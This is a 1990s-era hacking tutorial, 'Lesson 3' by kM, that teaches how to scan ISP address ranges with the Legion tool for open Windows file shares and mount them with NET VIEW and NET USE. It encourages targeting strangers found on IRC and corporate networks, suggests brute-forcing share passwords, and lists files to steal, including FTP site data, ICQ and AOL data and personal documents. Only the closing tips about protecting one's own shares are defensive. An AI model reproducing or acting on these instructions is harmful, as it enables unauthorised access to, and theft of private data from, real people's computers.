Lesson 3
by kM
kM@hackersclub.com
I'm assuming all of you have download Legion and loaded it. Good. Now its time to
start playing with it. You need a IP address to start out with. Why not scan your
ISP's users? Go to your Win95/98 Start button, run and type winipcfg
NT users type IPCONFIG
This will return what your IP address is that was assigned from your ISP. Type that
ip address into the SCAN FROM section in Legion program. For Example 206.11.11.13 is
my IP address put into Legion 206.11.11 You do not need the last series of numbers.
Now fill in on the bottom TO section 11 in the box provided. If there are multiple
subnets you want to scan then put another number in. I'd only recommend scanning one
at a time for now.
Now push SCAN. The left hand column will display the ip addresses that have netbios
support. Once the program has scanned all .1 - .254 ip addresses it will then connect
to each IP address and run NET VIEW. This will display whether or not that machine is
running any open shares. You should see something like this in the right hand column
if it found one.
Shared resources at \\206.11.11.42
Sharename Type Comment
-----------------------------------------------------------------
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Basically if you don't want your resources swallowed up get a list of the ip address and do
a NET VIEW \\IPADDRESS This will display the same information as above if there are open file
shares.
Now that you have found 1 machine with a file share. How do I connect to it? Simple!
Go to DOS and type in NET USE p: \\IPADDRESS\SHARENAME
For example: The resource above you would connect to the cdrive like this.
NET USE p: \\206.11.11.42\CDRIVE
Now it will normally take some time to connect. Once you connect you can see if what type of
access you have. Make a directory and remove it. If you get access denied you have READ access.
if you CAN make and remove that directory you have FULL access. Sometimes you will even be
prompted for a password to the share. You can attempt brute force by guessing a
million different passwords.
Now that you know how to scan and link. Take it one step further.. go to IRC or any place that
has a large mass of people. Get their ip address and do a NET VIEW on their ip address and see
if they are running any shares.
Normally if the user has allowed a FULL access shared without a password I normally create a text
file in C:\WINDOWS\DESKTOP and leave a little message.
I will say that in the Winhackgold.zip there is
a file telling you how to setup a scanner in MIRC for doing the same thing above.
Now that you have learned about accessing this. This can be handy for other things like when
get into a corporate network. Any company that is running a NT/95 network I can guarntee has
open file shares. =] Why not exploit them and take some documents! =]
Things to go after if you get into a computer.. (remember since your probably connecting at
28.8 - 56k) don't go after big files. Chances are the user on the other end will disconnect.
Go after things like c:\program files\cuteftp\tree.dat , c:\mirc\downloads , WarFTP stuff,
C:\MY DOCUMENTS, C:\WINDOWS\DESKTOP, any text files, AOL data, ICQ Data. Most of these things
are probably small and you can get them copied quickly.
Also, if you do run file shares here are a few things you can do to protect yourself.
#1 - Read Only access if you MUST share the entire hard drive. (still a bad idea)
#2 - Share out certain folders instead of the entire hard drive. Read Only again.
#3 - DON'T SHARE!
#4 - Load Net Watcher (Control Panel, Add/Remove Software, System Tools, Net Watcher) Requires
your windows 95/98 cd to be loaded. Run this to watch all the connections to your computer
allows you to disconnect people if they start to abuse your computer.
Send all your questions, bitch comments and otherwise praise to me km@hackersclub.com
kM